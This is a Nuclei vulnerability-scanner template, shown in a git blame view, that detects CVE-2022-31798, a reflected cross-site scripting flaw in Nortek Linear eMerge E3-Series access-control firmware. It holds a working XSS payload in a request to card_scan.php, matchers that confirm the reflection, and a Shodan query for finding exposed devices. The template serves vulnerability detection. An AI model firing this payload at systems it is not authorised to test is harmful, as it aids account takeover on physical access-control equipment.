nuclei-templates/http/cves/2022/CVE-2022-31798.yaml

53 lines
1.7 KiB
YAML
Raw Normal View History

2022-08-12 11:31:04 +00:00
id: CVE-2022-31798
info:
name: Nortek Linear eMerge E3-Series - Cross-Site Scripting
2022-08-12 11:31:04 +00:00
author: ritikchaddha
severity: medium
2022-08-12 11:31:04 +00:00
description: |
There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.
2022-08-12 11:31:04 +00:00
reference:
- https://packetstormsecurity.com/files/167992/
- http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31798
2023-07-11 19:49:27 +00:00
- https://eg.linkedin.com/in/omar-1-hashem
- https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-31798
2023-08-31 11:46:18 +00:00
cwe-id: CWE-384
2023-10-14 11:27:55 +00:00
epss-score: 0.0012
epss-percentile: 0.45948
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
2022-08-12 11:31:04 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: nortekcontrol
product: emerge_e3_firmware
2023-09-06 11:59:08 +00:00
shodan-query: http.title:"eMerge"
tags: cve2022,emerge,nortek,xss,packetstorm,cve
2022-08-12 11:31:04 +00:00
http:
2022-08-12 11:31:04 +00:00
- method: GET
path:
2022-08-13 00:01:54 +00:00
- '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'
2022-08-12 11:31:04 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-08-13 00:01:54 +00:00
- ',"CardFormatNo":"<img src=x onerror=alert(document.domain)>"}'
2022-08-12 11:31:04 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200